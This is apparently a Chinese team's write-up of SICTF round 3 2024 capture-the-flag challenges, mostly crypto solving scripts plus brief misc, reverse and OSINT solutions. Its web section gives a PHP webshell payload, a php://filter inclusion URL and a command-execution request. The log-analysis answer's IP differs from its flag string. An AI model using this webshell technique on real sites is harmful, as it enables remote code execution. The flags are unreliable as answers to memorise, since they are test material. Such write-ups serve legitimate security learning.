SICTF_round3-2024

https://yuanshen.life/games/3/challenges

队伍wp，难题不会做，简单题也不全会。

web：@Xuancrane

misc：@ctfer

Crypto：@baimi

Misc

[签到]签到

回复公众号，略

GeekChallenge

爆破咯

from pwn import *
from string import *

table = string.ascii_letters + string.digits + string.punctuation + " "
print(table)
line=''
list=''
io = remote('yuanshen.life',34725)
for i in range(12):
    io.recvline()
for i in range(114):
    if (len(list)==5):
        table=list
    for a in table:
        text='0'*i+a+'0'*(113-i)
        #    print(text)
        io.sendline(text)
        answer=io.recvline()
        #    print(answer)
        a2 = answer.decode()
        #   print(a2)
        if(a2[i+1]=='1'):
            if(a not in list):
                list+=a
            line+=a
            print(line)
            print(answer)
            break
io.sendline(line)
for i in range(3):
    a3=io.recvline()
    print(a3)

日志分析2

攻击者的IP地址：10.11.35.94

攻击者得到Web应用后台管理权限的方法：暴力破解

攻击者在SQL注入攻击过程中使用的自动化工具名称：sqlmap

工具版本号：1.2.4.18

攻击者使用的Webshell连接工具（中文名）：蚁剑

工具版本号：2.1

SICTF{10.11.35.95|暴力破解|sqlmap|1.2.4.18|蚁剑|2.1}

WHO?WHO?WHO?

压缩包密码是六位小写字母直接爆破就好“qweqwe”。内有文本文档，观察发现是一个零宽加密，在线工具查看原文

得到的内容显然是rabbit/AES，再推断得到密钥是“shumu”，毕竟文档问我谁是渣男，我的脚趾头告诉我是树木。

解密得到一堆

GTAGAGCTAGTCCTT{GGGTCACGGTTC_GGGTCACGGTTC_GAACGGTTC_GTAGTG_GCTTCA_GTAGACGTGGCGGTG_GTAGACTCA_TATGACCGG_GCTCGGGCT}

显然是dna解密

SICTF{Q1A0_Q1A0_GA0_SU_N1_SHUMU_SH1_ZHA_NAN}

问卷调查

略

Crypto

[签到]Vigenere

Gn taj xirly gf Fxgjuakd, oe igywnd mt tegbs mnrxxlrivywd sngearbsw wakksre. Bs kpimj gf tank, it bx gur bslenmngn th jfdetagur mt ceei yze Ugnled Lystel tx Amxwaca gjmtrtq.

An taj wvegy gf tank nom xmccxjvinz, bw prhugse ts sllbffce hs lhe ytdlopnfg btxas wbyz Meqnuo: Tafl we lmsll ffce wtw logxyzer tsv madj heavj logxyzer. Pj khaeq yivLNUTF{4695vft9-fd68-4684-uj81-u6c1avg6uaft}j yenxwgus ynfanvnsl snuhorm, ffd ag zfdekxlanwnfg og tmr ptwl thty Eexbhg is mt jechsiuek yze lhxl tekwatokd an Nxb Eexbhg, Teqfk, anw Fjizhss. Thx iwtabqk of ljltlxrwnt tww leyy lo yhz.

Qou tww inlyjucmjv to bsxorf yze Pkjkidxsl [of Fjpich] tx thx ftovx nf thx ljeamjkt chsxidxsue al xgon tx at il hwrttnf thty lhekj oile gw an hzlbrxfc of pfj wimm lhe Nsatew Xlatxx snd lzygely lham yze Pkjkidxsl, on ank owg nfitbflivx, nfvimj Bapts lo ifrwdityw adajjenvj oita yzis iqsn; am yze strw tifj, gffxw lo mxiaatx gwtwxjf Jaiff anw tmrsxqnes.

Iqwasx hsll mt lhe tylenmngn oy yze Pkjkidxsl thty lhe kzlhlxxk emiqgymxsl of hzj suursrigjk nop txfekx lhe iwgspxhl of vtepeeqang Xsylagi lo mtpw pethw in t kww mhslhs.

在线网站直接梭

On the first of February, we intend to begin unrestricted submarine warfare. In spite of this, it is our intention to endeavour to keep the United States of America neutral.

In the event of this not succeeding, we propose an alliance on the following basis with Mexico: That we shall make war together and make peace together. We shall givSICTF{4695cab9-fd68-4684-be81-c6c1acb6cafa}e generous financial support, and an understanding on our part that Mexico is to reconquer the lost territory in New Mexico, Texas, and Arizona. The details of settlement are left to you.

You are instructed to inform the President [of Mexico] of the above in the greatest confidence as soon as it is certain that there will be an outbreak of war with the United States and suggest that the President, on his own initiative, invite Japan to immediate adherence with this plan; at the same time, offer to mediate between Japan and ourselves.

Please call to the attention of the President that the ruthless employment of our submarines now offers the prospect of compelling England to make peace in a few months.

SICTF{4695cab9-fd68-4684-be81-c6c1acb6cafa}

签到，确信！

from Crypto.Util.number import *
from enc import flag

m = bytes_to_long(flag)
def gen_keys(bits):
    while 1:
        p = getPrime(bits)
        q = sum([p**i for i in range(7)])
        if isPrime(q):
            r = getPrime(1024)
            n = p*q*r
            return p,n
p,n = gen_keys(512)
e = 65537
c = pow(m,e,n)
print(f"n = {n}")
print(f"e = {e}")
print(f"c = {c}")
'''
n = 8361361624563191168612863710516449028280757632934603412143152925186847721821552879338608951120157631182699762833743097837368740526055736516080136520584848113137087581886426335191207688807063024096128001406698217998816782335655663803544853496060418931569545571397849643826584234431049002394772877263603049736723071392989824939202362631409164434715938662038795641314189628730614978217987868150651491343161526447894569241770090377633602058561239329450046036247193745885174295365633411482121644408648089046016960479100220850953009927778950304754339013541019536413880264074456433907671670049288317945540495496615531150916647050158936010095037412334662561046016163777575736952349827380039938526168715655649566952708788485104126900723003264019513888897942175890007711026288941687256962012799264387545892832762304320287592575602683673845399984039272350929803217492617502601005613778976109701842829008365226259492848134417818535629827769342262020775115695472218876430557026471282526042545195944063078523279341459199475911203966762751381334277716236740637021416311325243028569997303341317394525345879188523948991698489667794912052436245063998637376874151553809424581376068719814532246179297851206862505952437301253313660876231136285877214949094995458997630235764635059528016149006613720287102941868517244509854875672887445099733909912598895743707420454623997740143407206090319567531144126090072331
e = 65537
c = 990174418341944658163682355081485155265287928299806085314916265580657672513493698560580484907432207730887132062242640756706695937403268682912083148568866147011247510439837340945334451110125182595397920602074775022416454918954623612449584637584716343806255917090525904201284852578834232447821716829253065610989317909188784426328951520866152936279891872183954439348449359491526360671152193735260099077198986264364568046834399064514350538329990985131052947670063605611113730246128926850242471820709957158609175376867993700411738314237400038584470826914946434498322430741797570259936266226325667814521838420733061335969071245580657187544161772619889518845348639672820212709030227999963744593715194928502606910452777687735614033404646237092067644786266390652682476817862879933305687452549301456541574678459748029511685529779653056108795644495442515066731075232130730326258404497646551885443146629498236191794065050199535063169471112533284663197357635908054343683637354352034115772227442563180462771041527246803861110504563589660801224223152060573760388045791699221007556911597792387829416892037414283131499832672222157450742460666013331962249415807439258417736128976044272555922344342725850924271905056434303543500959556998454661274520986141613977331669376614647269667276594163516040422089616099849315644424644920145900066426839607058422686565517159251903275091124418838917480242517812783383
'''

参考【DASCTF X 0psu3十一月挑战赛｜越艰巨·越狂热】Crypto-GeneratePrime

https://blog.csdn.net/jayq1/article/details/134626426

板子题，直接梭

from Crypto.Util.number import *


P.<x, y> = PolynomialRing(ZZ)
R.<z> = PolynomialRing(ZZ)
z = R.gens()[0]
def calculate_eta_all(eta, aa, bb, m, k):
    eta_all = []
    for i in range(k):
        temp = eta**(aa**i)
        add = temp
        for _ in range((m-1)//k - 1):
            add = add**bb
            temp += add
        eta_all.append(temp)
    return eta_all

def calculate_irreducible_polynomial(eta_all, m):
    h = 1
    for i in range(k):
        h *= (y - eta_all[i].lift())

    d = sum([x**i for i in range(m)])
    f_irreducible = h % d

    return f_irreducible, d

def pad_polynomial_coefficients(f, m):
    tmp = f.list()
    while len(tmp) < m:
        tmp.append(0)
    return tmp
    
def Factoring_with_Cyclotomic_Polynomials(k, n):
    
    if k == 1:
        print('k = 1')
        a = 2
        while True:
            print('a =', a)
            p = gcd(int(pow(a, n, n)-1), n)
            if p > 2**20 and n % p == 0:
                return p
            a += 1

    Phi = cyclotomic_polynomial(k)
    Psi = (z**k-1)//(cyclotomic_polynomial(k))
    print('Cyclotomic_Polynomials Phi:', Phi)
    print('Psi:', Psi)
    m = 1
    while True:
        useful = False
        while not useful:
            m += k
            if not isPrime(m):
                continue

            aa = primitive_root(m)
            ff = x**m - 1
            Q = P.quo(ff)
            eta = Q.gens()[0]
            for bb in range(2, m):
                if (bb**((m-1)//k)-1)//(bb-1) % m:
                    continue
                eta_all = calculate_eta_all(eta, aa, bb, m, k)
                f_irreducible, d = calculate_irreducible_polynomial(eta_all, m)
                if f_irreducible.subs(y=0) in ZZ:
                    useful = True
                    break

#         print(aa, bb)
#         print(m)

        eta0 = eta_all[0]
        eta0_pow = []
        for i in range(2, k):
            eta0_pow_i = (eta0**i).lift().subs(x=z)
            constant_term = eta0_pow_i.list()[0]
            if constant_term != 0:
                dd = (d-1).subs(x=z)
                eta0_pow_i = eta0_pow_i - constant_term - constant_term * dd
            eta0_pow.append(eta0_pow_i)

        coefficients = []
        for i in range(k):
            coefficients.append(pad_polynomial_coefficients(eta_all[i].lift().subs(x=z), m))

        A = matrix(QQ, coefficients)
        terget = [[-1]*k, [1] + [0]*(k-1)]
        for i in range(k-2):
            terget.append(A.solve_left(vector(pad_polynomial_coefficients(eta0_pow[i], m))))

        B = matrix(QQ, terget)

        U.<w> = PolynomialRing(QQ)
        w = U.gens()[0]
        eta1 = U(list((B**-1)[1]))
        f = f_irreducible.subs(y=w)
        V = U.quo(f)
        eta1 = V(eta1)

        C = matrix(QQ, k, k)
        C[0, 0] = 1
        for i in range(1, k):
            tmp = eta1**i
            C[i] = pad_polynomial_coefficients(tmp, k)

        K.<s> = PolynomialRing(Zmod(n))
        f_modulo = f_irreducible.subs(y=s)
        K_quo = K.quo(f_modulo)

        f_ZZ = f_irreducible.subs(y=z)
        try:
            sigma = matrix(Zmod(n), C)
        except:
            continue
        while True:
            g = R.random_element(k - 1)
            try:
                kk, _, h = xgcd(f_ZZ, g)
                h = inverse_mod(int(kk), n) * h
                break
            except:
                continue
        g = g.subs(y=x)       
        g_Q = K_quo(g)
        h_Q = K_quo(h)
        assert g_Q * h_Q == 1
        
        Psi_coefficients = Psi.coefficients()
        Psi_monomials = Psi.monomials()[::-1]
        if Psi_coefficients[0] < 0:
            yy = h_Q**(-Psi_coefficients[0]) 
        else:
            yy = g_Q**(Psi_coefficients[0]) 

        for i in range(1, len(Psi_monomials)):
            if Psi_coefficients[i] < 0:
                yy *= K_quo(list(vector(list(h_Q**(-Psi_coefficients[i]))) * Psi_monomials[i](sigma)))
            else:
                yy *= K_quo(list(vector(list(g_Q**(Psi_coefficients[i]))) * Psi_monomials[i](sigma)))
        yy = yy**n
        if gcd(yy[1], n) > 2**20:
            return gcd(yy[1], n)


if __name__ == "__main__":
    k = 7  # the k-th  
    n = 8361361624563191168612863710516449028280757632934603412143152925186847721821552879338608951120157631182699762833743097837368740526055736516080136520584848113137087581886426335191207688807063024096128001406698217998816782335655663803544853496060418931569545571397849643826584234431049002394772877263603049736723071392989824939202362631409164434715938662038795641314189628730614978217987868150651491343161526447894569241770090377633602058561239329450046036247193745885174295365633411482121644408648089046016960479100220850953009927778950304754339013541019536413880264074456433907671670049288317945540495496615531150916647050158936010095037412334662561046016163777575736952349827380039938526168715655649566952708788485104126900723003264019513888897942175890007711026288941687256962012799264387545892832762304320287592575602683673845399984039272350929803217492617502601005613778976109701842829008365226259492848134417818535629827769342262020775115695472218876430557026471282526042545195944063078523279341459199475911203966762751381334277716236740637021416311325243028569997303341317394525345879188523948991698489667794912052436245063998637376874151553809424581376068719814532246179297851206862505952437301253313660876231136285877214949094995458997630235764635059528016149006613720287102941868517244509854875672887445099733909912598895743707420454623997740143407206090319567531144126090072331
    pp = Factoring_with_Cyclotomic_Polynomials(k, n)
    assert not n % pp
    print('factor is found:', pp)
# 12682901567122222027862267249598083531042605533994291954963094692106317834600627170541482405569672263127679934367189535951903117852500278279000920954628951

得到p，代入其他步骤正常解密即可

from Crypto.Util.number import *
import gmpy2

p = 12682901567122222027862267249598083531042605533994291954963094692106317834600627170541482405569672263127679934367189535951903117852500278279000920954628951
n = 8361361624563191168612863710516449028280757632934603412143152925186847721821552879338608951120157631182699762833743097837368740526055736516080136520584848113137087581886426335191207688807063024096128001406698217998816782335655663803544853496060418931569545571397849643826584234431049002394772877263603049736723071392989824939202362631409164434715938662038795641314189628730614978217987868150651491343161526447894569241770090377633602058561239329450046036247193745885174295365633411482121644408648089046016960479100220850953009927778950304754339013541019536413880264074456433907671670049288317945540495496615531150916647050158936010095037412334662561046016163777575736952349827380039938526168715655649566952708788485104126900723003264019513888897942175890007711026288941687256962012799264387545892832762304320287592575602683673845399984039272350929803217492617502601005613778976109701842829008365226259492848134417818535629827769342262020775115695472218876430557026471282526042545195944063078523279341459199475911203966762751381334277716236740637021416311325243028569997303341317394525345879188523948991698489667794912052436245063998637376874151553809424581376068719814532246179297851206862505952437301253313660876231136285877214949094995458997630235764635059528016149006613720287102941868517244509854875672887445099733909912598895743707420454623997740143407206090319567531144126090072331
e = 65537
c = 990174418341944658163682355081485155265287928299806085314916265580657672513493698560580484907432207730887132062242640756706695937403268682912083148568866147011247510439837340945334451110125182595397920602074775022416454918954623612449584637584716343806255917090525904201284852578834232447821716829253065610989317909188784426328951520866152936279891872183954439348449359491526360671152193735260099077198986264364568046834399064514350538329990985131052947670063605611113730246128926850242471820709957158609175376867993700411738314237400038584470826914946434498322430741797570259936266226325667814521838420733061335969071245580657187544161772619889518845348639672820212709030227999963744593715194928502606910452777687735614033404646237092067644786266390652682476817862879933305687452549301456541574678459748029511685529779653056108795644495442515066731075232130730326258404497646551885443146629498236191794065050199535063169471112533284663197357635908054343683637354352034115772227442563180462771041527246803861110504563589660801224223152060573760388045791699221007556911597792387829416892037414283131499832672222157450742460666013331962249415807439258417736128976044272555922344342725850924271905056434303543500959556998454661274520986141613977331669376614647269667276594163516040422089616099849315644424644920145900066426839607058422686565517159251903275091124418838917480242517812783383

q = sum([p**i for i in range(7)])
print(p)
print(q)
r = n//p//q
phi = (p-1)*(q-1)*(r-1)
phi2 = (p**7-p)*(r-1)
if phi == phi2:
    print("1")
else:
    print("2")

d = gmpy2.invert(e,phi)
m = pow(c,d,n)
print(long_to_bytes(m))
#SICTF{d9428fc7-fa3a-4096-8ec9-191c0a4562ff}

SuperbRSA

#user:mumu666
from Crypto.Util.number import *
p=getPrime(1024)
q=getPrime(1024)
n=p*q
e1=55
e2=200
m=bytes_to_long("flag")
assert(pow(m,5) < n)
c1 = pow(m, e1, n)
c2 = pow(m, e2, n)
print("n=",n)
print("c1=",c1)
print("c2=",c2)

n= 19006830358118902392432453595802675566730850352890246995920642811967821259388009049803513102750594524106471709641202019832682438027312468849299985832675191795417160553379580813410722359089872519372049229233732405993062464286888889084640878784209014165871696882564834896322508054231777967011195636564463806270998326936161449009988434249178477100127347406759932149010712091376183710135615375272671888541233275415737155953323133439644529709898791881795186775830217884663044495979067807418758455237701315019683802437323177125493076113419739827430282311018083976114158159925450746712064639569301925672742186294237113199023
c1= 276245243658976720066605903875366763552720328374098965164676247771817997950424168480909517684516498439306387133611184795758628248588201187138612090081389226321683486308199743311842513053259894661221013008371261704678716150646764446208833447643781574516045641493770778735363586857160147826684394417412837449465273160781074676966630398315417741542529612480836572205781076576325382832502694868883931680720558621770570349864399879523171995953720198118660355479626037129047327185224203109006251809257919143284157354935005710902589809259500117996982503679601132486140677013625335552533104471327456798955341220640782369529
c2= 11734019659226247713821792108026989060106712358397514827024912309860741729438494689480531875833287268454669859568719053896346471360750027952226633173559594064466850413737504267807599435679616522026241111887294138123201104718849744300769676961585732810579953221056338076885840743126397063074940281522137794340822594577352361616598702143477379145284687427705913831885493512616944504612474278405909277188118896882441812469679494459216431405139478548192152811441169176134750079073317011232934250365454908280676079801770043968006983848495835089055956722848080915898151352242215210071011331098761828031786300276771001839021

共模攻击，看到e1=55,e2=200，显然是变形题，直接梭

import gmpy2
def egcd(a, b):
	if a == 0:
		return (b, 0, 1)
	else:
		g, y, x = egcd(b % a, a)
		return (g, x - (b // a) * y, y)

n = 19006830358118902392432453595802675566730850352890246995920642811967821259388009049803513102750594524106471709641202019832682438027312468849299985832675191795417160553379580813410722359089872519372049229233732405993062464286888889084640878784209014165871696882564834896322508054231777967011195636564463806270998326936161449009988434249178477100127347406759932149010712091376183710135615375272671888541233275415737155953323133439644529709898791881795186775830217884663044495979067807418758455237701315019683802437323177125493076113419739827430282311018083976114158159925450746712064639569301925672742186294237113199023
e1 = 55
e2 = 200
c1 = 276245243658976720066605903875366763552720328374098965164676247771817997950424168480909517684516498439306387133611184795758628248588201187138612090081389226321683486308199743311842513053259894661221013008371261704678716150646764446208833447643781574516045641493770778735363586857160147826684394417412837449465273160781074676966630398315417741542529612480836572205781076576325382832502694868883931680720558621770570349864399879523171995953720198118660355479626037129047327185224203109006251809257919143284157354935005710902589809259500117996982503679601132486140677013625335552533104471327456798955341220640782369529
c2 = 11734019659226247713821792108026989060106712358397514827024912309860741729438494689480531875833287268454669859568719053896346471360750027952226633173559594064466850413737504267807599435679616522026241111887294138123201104718849744300769676961585732810579953221056338076885840743126397063074940281522137794340822594577352361616598702143477379145284687427705913831885493512616944504612474278405909277188118896882441812469679494459216431405139478548192152811441169176134750079073317011232934250365454908280676079801770043968006983848495835089055956722848080915898151352242215210071011331098761828031786300276771001839021

s = egcd(e1, e2)
s1 = s[1]
s2 = s[2]
if s1<0:
	s1 = - s1
	c1 = gmpy2.invert(c1, n)
elif s2<0:
	s2 = - s2
	c2 = gmpy2.invert(c2, n)

m = pow(c1,s1,n)*pow(c2,s2,n) % n
m=gmpy2.iroot(m,gmpy2.gcd(e1,e2))[0]
print(m)
print(bytes.fromhex(hex(m)[2:]))
#41420154382173221391998389269922076511388051219698121955555613671512511029454467993190269
#b'SICTF{S0_Great_RSA_Have_Y0u_Learned?}'

gggcccddd

from Crypto.Util.number import *
from enc import flag

m = bytes_to_long(flag)

p = getPrime(512)
q = getPrime(512)
n = p*q
e = 65537
c1 = pow(m,e,n)
c2 = pow(233*m+9527,e,n)
print(f'n = {n}')
print(f'c1 = {c1}')
print(f'c2 = {c2}')
print(f'e = {e}')
"""
n = 71451784354488078832557440841067139887532820867160946146462765529262021756492415597759437645000198746438846066445835108438656317936511838198860210224738728502558420706947533544863428802654736970469313030584334133519644746498781461927762736769115933249195917207059297145965502955615599481575507738939188415191
c1 = 60237305053182363686066000860755970543119549460585763366760183023969060529797821398451174145816154329258405143693872729068255155086734217883658806494371105889752598709446068159151166250635558774937924668506271624373871952982906459509904548833567117402267826477728367928385137857800256270428537882088110496684
c2 = 20563562448902136824882636468952895180253983449339226954738399163341332272571882209784996486250189912121870946577915881638415484043534161071782387358993712918678787398065688999810734189213904693514519594955522460151769479515323049821940285408228055771349670919587560952548876796252634104926367078177733076253
e = 65537
"""

Franklin-Reiter相关消息攻击

https://blog.csdn.net/XiongSiqi_blog/article/details/130978226

import libnum
n=71451784354488078832557440841067139887532820867160946146462765529262021756492415597759437645000198746438846066445835108438656317936511838198860210224738728502558420706947533544863428802654736970469313030584334133519644746498781461927762736769115933249195917207059297145965502955615599481575507738939188415191
a=233
b=9527
c1=60237305053182363686066000860755970543119549460585763366760183023969060529797821398451174145816154329258405143693872729068255155086734217883658806494371105889752598709446068159151166250635558774937924668506271624373871952982906459509904548833567117402267826477728367928385137857800256270428537882088110496684
c2=20563562448902136824882636468952895180253983449339226954738399163341332272571882209784996486250189912121870946577915881638415484043534161071782387358993712918678787398065688999810734189213904693514519594955522460151769479515323049821940285408228055771349670919587560952548876796252634104926367078177733076253
e=65537
import binascii
def franklinReiter(n,e,c1,c2,a,b):
    PR.<x> = PolynomialRing(Zmod(n))
    g1 = (x)^e - c1
    g2 = (a*x+b)^e - c2

    def gcd(g1, g2):
        while g2:
            g1, g2 = g2, g1 % g2
        return g1.monic() # 
    return -gcd(g1, g2)[0]

m=franklinReiter(n,e,c1,c2,a,b)
print(libnum.n2s(int(m)))
#SICTF{45115fb2-84d6-4369-88c2-c8c3d72b4c55}

跑了47分钟。。

easyLattice

from Crypto.Util.number import *
from secret import flag
import gmpy2

assert len(flag) == 47

f = bytes_to_long(flag)
p = getPrime(512)
g = getPrime(128)
h = gmpy2.invert(f, p) * g % p

print('h =', h)
print('p =', p)

"""
h = 9848463356094730516607732957888686710609147955724620108704251779566910519170690198684628685762596232124613115691882688827918489297122319416081019121038443
p = 11403618200995593428747663693860532026261161211931726381922677499906885834766955987247477478421850280928508004160386000301268285541073474589048412962888947     
"""

根据题目所给关系式，可以得到

f = h(-1)*g+kp

构造格子

2^256,h^(-1)

0 ,p

h = 9848463356094730516607732957888686710609147955724620108704251779566910519170690198684628685762596232124613115691882688827918489297122319416081019121038443
p = 11403618200995593428747663693860532026261161211931726381922677499906885834766955987247477478421850280928508004160386000301268285541073474589048412962888947     
from Crypto.Util.number import *
import gmpy2
h = gmpy2.invert(h,p)
mat = [[2**256,h],[0,p]]
M = Matrix(ZZ,mat)
#print(M)
m,r= M.LLL()[0]
'''LLL 算法是一种格约化算法，用于查找格的约简基。
LLL 方法返回一个由两个元素组成的元组：
简化基和将原始基转换为简化基的矩阵'''
print(m,r)
flag = long_to_bytes(abs(r))  # abs()返回数字的绝对值
print(flag)
 
#29555150073396592208680335494684523983684143293301981158157800432304888982432677680588686983225737089584138075242496 50073894085033274448337202692453522746880698077702322983028272289946704698284083256500537353714697134260425361796
#b'SICTF{e3fea01c-18f3-4638-9544-9201393940a9}A\xf0\x89\x84'

web

100％_upload

文件内容 <? echo '123';@eval($_POST[cmd]);?>

64编码

PD8gZWNobyAnMTIzJztAZXZhbCgkX1BPU1RbY21kXSk7Pz4=

http://yuanshen.life:33908/index.php?file=php://filter/convert.base64-decode/resource=uploads/base4.jpg

post：cmd=system("tac /flag");

逆向

[签到]Baby_C++

Ghidra 瞎点点就有了

Forensics

OSINT签到

抖音识图 缩小范围 第一个视频就是

树木的压迫

抖音识图 缩小到体育馆 第一个视频可以得知是达州 谷歌识图找到具体位置

真的签到

抖音识图第一个视频直出

签退

谷歌识图根据红绿灯判断是开普敦 然后上b站看看视频 发现有个相似的店名为STEERS 然后上谷歌地图即可得到位置